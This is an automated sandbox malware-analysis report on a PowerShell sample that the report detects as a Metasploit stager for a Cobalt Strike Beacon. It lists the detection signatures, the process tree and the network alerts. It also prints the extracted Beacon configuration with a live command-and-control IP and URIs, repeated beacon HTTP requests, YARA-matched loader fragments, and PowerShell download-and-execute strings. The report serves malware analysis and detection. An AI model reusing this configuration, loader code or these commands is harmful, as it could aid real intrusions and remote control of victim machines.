Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3.ps1

Overview

General Information

Sample name:3.ps1
Analysis ID:1562630
MD5:69c80576e5413dc4d0d60de98439f649
SHA1:2fe44c3f073e661eb0cd6dd2c5890b067743ea5d
SHA256:85856010d3e63101c30a3d061dd55c758350030dd9b14794044a479860abb37f
Tags:ps1user-nawhack
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected MetasploitPayload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found suspicious powershell code related to unpacking or dynamic code loading
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 1900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 8080, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "3.78.244.11,/dot.gif", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
3.ps1JoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
    3.ps1Msfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
    • 0x83:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
    • 0x5a8:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
    • 0x695:$s5: = [System.Convert]::FromBase64String(
    • 0x2fe:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
    • 0x4f1:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.4122124036.0000022EF9EB0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
      00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
          • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
          • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
          • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
          • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
          • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
          • 0x32d6a:$a11: Could not open service control manager on %s: %d
          • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
          • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
          • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
          • 0x33255:$a15: could not create remote thread in %d: %d
          • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33203:$a17: could not write to process memory: %d
          • 0x32d9b:$a18: Could not create service %s on %s: %d
          • 0x32e24:$a19: Could not delete service %s on %s: %d
          • 0x32c89:$a20: Could not open process token: %d (%u)
          00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
          • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
          Click to see the 44 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.powershell.exe.22ef9b10000.0.raw.unpackJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
            0.2.powershell.exe.22efa0b0000.1.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
              0.2.powershell.exe.22ef9b10000.0.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
                0.2.powershell.exe.22ef9b10000.0.raw.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
                  0.2.powershell.exe.22ef9b10000.0.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
                    Click to see the 40 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_1900.amsi.csvJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
                      amsi64_1900.amsi.csvMsfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
                      • 0xe5:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
                      • 0x617:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
                      • 0x70a:$s5: = [System.Convert]::FromBase64String(
                      • 0x367:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
                      • 0x55f:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", ProcessId: 1900, ProcessName: powershell.exe
                      Sigma detected: Communication To Uncommon Destination Ports
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 3.78.244.11, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Initiated: true, ProcessId: 1900, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", ProcessId: 1900, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T19:57:52.370990+010020337131Targeted Malicious Activity was Detected192.168.2.4500133.78.244.118080TCP
                      2024-11-25T19:58:04.324931+010020337131Targeted Malicious Activity was Detected192.168.2.4497303.78.244.118080TCP
                      2024-11-25T19:58:26.502407+010020337131Targeted Malicious Activity was Detected192.168.2.4497313.78.244.118080TCP
                      2024-11-25T19:58:48.674634+010020337131Targeted Malicious Activity was Detected192.168.2.4497383.78.244.118080TCP
                      2024-11-25T19:59:10.821761+010020337131Targeted Malicious Activity was Detected192.168.2.4497393.78.244.118080TCP
                      2024-11-25T19:59:33.097220+010020337131Targeted Malicious Activity was Detected192.168.2.4497673.78.244.118080TCP
                      2024-11-25T19:59:55.285301+010020337131Targeted Malicious Activity was Detected192.168.2.4498163.78.244.118080TCP
                      2024-11-25T20:00:17.416993+010020337131Targeted Malicious Activity was Detected192.168.2.4498643.78.244.118080TCP
                      2024-11-25T20:00:39.636064+010020337131Targeted Malicious Activity was Detected192.168.2.4499153.78.244.118080TCP
                      2024-11-25T20:01:01.824176+010020337131Targeted Malicious Activity was Detected192.168.2.4499633.78.244.118080TCP
                      2024-11-25T20:01:23.980870+010020337131Targeted Malicious Activity was Detected192.168.2.4500113.78.244.118080TCP
                      2024-11-25T20:01:46.137579+010020337131Targeted Malicious Activity was Detected192.168.2.4500123.78.244.118080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 3.ps1Avira: detected
                      Found malware configuration
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8080, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "3.78.244.11,/dot.gif", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
                      Multi AV Scanner detection for submitted file
                      Source: 3.ps1ReversingLabs: Detection: 73%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.5% probability
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0B1184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_0000022EFA0B1184
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0E2020 CryptGenRandom,0_2_0000022EFA0E2020
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_0000022EFA0C1C30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_0000022EFA0C9220

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49730 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49816 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49864 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49915 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49963 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50011 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50012 -> 3.78.244.11:8080
                      Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50013 -> 3.78.244.11:8080
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 3.78.244.11
                      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 3.78.244.11:8080
                      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 3.78.244.11:8080Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 3.78.244.11
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0BE68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_0000022EFA0BE68C
